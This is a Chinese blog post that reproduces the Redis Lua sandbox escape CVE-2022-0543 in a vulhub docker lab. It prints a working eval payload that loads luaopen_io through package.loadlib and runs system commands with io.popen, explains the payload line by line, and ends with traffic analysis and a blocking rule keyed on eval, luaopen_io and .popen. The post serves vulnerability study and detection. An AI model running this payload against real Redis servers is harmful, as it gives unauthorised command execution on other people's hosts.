Redis-未授权访问-CVE-2022-0543 (redis沙盒逃逸)

于 2024-05-13 21:30:48 发布
阅读量904 收藏 9
点赞数 26
分类专栏: 漏洞复现 文章标签: redis 数据库 网络安全 容器 docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MateSnake/article/details/138820548
版权

Redis-未授权访问-CVE-2022-0543 (redis沙盒逃逸)

参考

https://blog.csdn.net/xhscxj/article/details/128862680?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171552363116800182726619%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=171552363116800182726619&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-4-128862680-null-null.142^v100^pc_search_result_base4&utm_term=redis-cve_2022_0543&spm=1018.2226.3001.4187

Redis简介

Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。

漏洞介绍

Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。
Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

影响版本

2.2 <= redis < 5.0.13

2.2 <= redis < 6.0.15

2.2 <= redis < 6.2.5

漏洞复现

复现条件

redis版本符合上述版本,并且可以成功登录redis,类似redis未授权访问

演示

进入靶场目录
cd /root/vulhub-master/redis/CVE-2022-0543
开启靶场

执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器

docker compose up -d

image.png

攻击靶机

方法一
windows的cmd命令连接靶机redis

redis-cli -h 192.168.61.131 -p 6379

image.png

执行payload

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

payload的whoami为可以执行的任意系统命令位置,可以换成id或者pwd等等
image.png

方法二
用redis图形化连接工具连接靶机
image.png
同样执行payload,我这里换成看id

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

image.png
image.png
image.png

漏洞原理

因为Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package
攻击者可通过package中的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0中的函数luaopen_io,在Lua中执行这个导出函数,即可获得io库,再使用其执行命令。

POC解析

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("whoami", "r");
local res = f:read("*a");
f:close();
return res

1.通过loadlib函数加载动态连接库中的luaopen_io函数,并赋给io_l
2.执行io_l(),获取io库
3.通过io库中的popen来执行命令,并把执行结果返回赋给f
4.读取f中命令执行的结果内容
5.关闭f
6.将读取的结果内容返回

连接上redis后,通过eval函数来执行上述脚本,即为payload的构成

流量特征分析

通过wireshack抓包可看到,为tcp流量
image.png
并且数据包中含有漏洞payload的全部内容,这样拦截规则就很好编写了
1.eval:因为脚本内容必须通过eval来执行
2.luaopen_io:因为此攻击必须通过执行luaopen_io函数来获取io库
3…popen:恶意命令必须通过io库中的popen函数来执行,为什么拦截规则不是io.popen,因为io仅是一个对象名称,是可自定义的

拦截规则

tcp流量中同时产生关键字eval、luaopen_io、.popen时进行拦截

关闭靶场

docker-compose down

image.png

Manba_77
关注
  • 26
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Another-Redis-Desktop-Manager.1.5.6
07-22
官网下载太慢,这里做了提取,可以在这里下载
redis++使用说明,windows下编译redis-plus-plus
06-13
redis++使用说明,windows下编译redis-plus-plus
虚拟机/沙箱逃匿漏洞复现
温和的跳跃
01-23 310
明天研究这个。
Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 1774
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
沙箱逃逸-通过题解了解沙箱逃逸
qq_56815564的博客
05-31 1118
这个系列的最后一题,给了个窗口,先按照提示输入对应的字符看看:G是表明了黑名单,这里不能执行import,不能定义函数,不能使用lambda表达式,可以的就是能执行多行代码。这个时候想到类的定义把带有@的函数放到某个函数的定义处,相当于执行了一次@后的函数后面这个是一个类定义,这里的pass的主要作用就是占据位置,让代码整体完整,定义一个空类会报错尝试执行:进入main函数主体,这个时候就可以通过使用一句话RCE来获取shell了这个系列就结束了,个人觉得还是挺面向新手的,一步一步来吧。
CVE-2022-0543 Redis沙盒逃逸漏洞
weixin_45715461的博客
07-01 3478
CVE-2022-0543 Redis沙盒逃逸漏洞
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 887
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
redis-stack-server 7.2.0 安装包合集
最新发布
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
docker-redis-cluster:一个 Redis 集群 Docker 镜像
05-29
docker-redis-cluster Redis 集群 Docker 映像。 此图像用于测试环境。 请勿将其用于生产。用法启动集群。 它将启动 6 个 Redis 服务器,监听7000~7005端口和一个主管以确保所有服务器都启动。 在所有服务器启动后,...
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
resty-redis-cluster:Redis集群的Openresty lua客户端
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Foreverlove112的博客
09-22 469
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
redis漏洞修复:CVE-2022-35977、CVE-2023-22458、CVE-2023-28856
大新新大浩浩的博客
09-20 823
redis漏洞修复:CVE-2022-35977、CVE-2023-22458、CVE-2023-28856
CVE-2022-0543redis沙盒逃逸
huayimy的博客
02-03 815
CVE-2022-0543redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
Redis 拒绝服务漏洞(CVE-2023-28856)修复处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-07 1694
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。官方补丁:https://github.com/redis/redis/,https://github.com/redis/redis/pull/11149,RDB 格式的内容和 AOF 格式的内容,该文件的前半段是 RDB 格式的全量数据,而后半段是 Redis 命令格式的增量数据;丢失数据的概率相对有点大。
【严重】vm2 <3.9.15 沙箱逃逸漏洞(CVE-2023-29017)
murphysec的博客
04-13 1195
vm2 是一个沙箱,用于在 Node.js 环境中运行不受信任的代码。宿主对象(Host objects)是指由 Node.js 的宿主环境提供的对象,例如全局对象、文件系统或网络请求等。 vm2 3.9.15之前版本中,当处理异步错误时正确处理 Error.prepareStackTrace 的宿主对象,攻击者可利用该漏洞绕过沙箱保护,在运行沙箱的主机上远程执行任意代码。
奇安信代码安全实验室帮助 RedHat 修复两个 oVirt 漏洞,获官方致谢
smellycat000的专栏
09-25 505
聚焦源代码安全,网罗国内外最新资讯!奇安信代码安全实验室研究员帮助 Red Hat在oVirt-engine 软件中发现了两个漏洞(CVE-2020-14333和CVE-2020-107...
Redis 入门指南
Java笔记虾
08-23 762
点击上方“后端技术精选”,选择“置顶公众号”技术文章第一时间送达!作者:dunwuhttps://github.com/dunwu/db-tutorial1. 概述1.1...
NodeJS vm&vm2沙箱逃逸
leekos的博客,分享web安全相关知识~
08-05 1217
在讲沙箱逃逸之前,我们需要了解一下什么是沙箱。沙箱就是一个集装箱,把你的应用装到沙箱里去运行,这样应用与应用之间就产生了边界,不会相互影响。当我们运行一些可能产生危害的程序时,我们不能直接在主机上运行。我们可以单独开辟一个运行代码的环境,这个环境就是沙箱,它与主机相互隔离,但使用主机的资源,但有危害的代码在沙箱内运行只会对沙箱内部产生一些影响,不影响主机的功能。
[漏洞复现]Redis 沙盒逃逸漏洞(CVE-2022-0543
k5664524的博客
01-25 572
Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。
redis-cli发送到redis-server
01-05
redis-cli是Redis提供的一个Shell工具,用于与redis-server进行交互。通过redis-cli,我们可以发送命令给redis-server,并获取执行结果。 下面是一个演示redis-cli发送命令给redis-server的例子: ```shell redis-cli -h <host> -p <port> <command> ``` 其中,`<host>`是redis-server的主机名或IP地址,`<port>`是redis-server的端口号,`<command>`是要发送的命令。 例如,如果redis-server运行在本地主机上的默认端口6379,我们可以使用以下命令发送PING命令给redis-server: ```shell redis-cli -h localhost -p 6379 PING ``` 执行以上命令后,redis-cli会将PING命令发送给redis-server,并显示执行结果,如果连接成功,会返回PONG。 请注意,根据你的实际情况,需要替换`<host>`和`<port>`为正确的值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值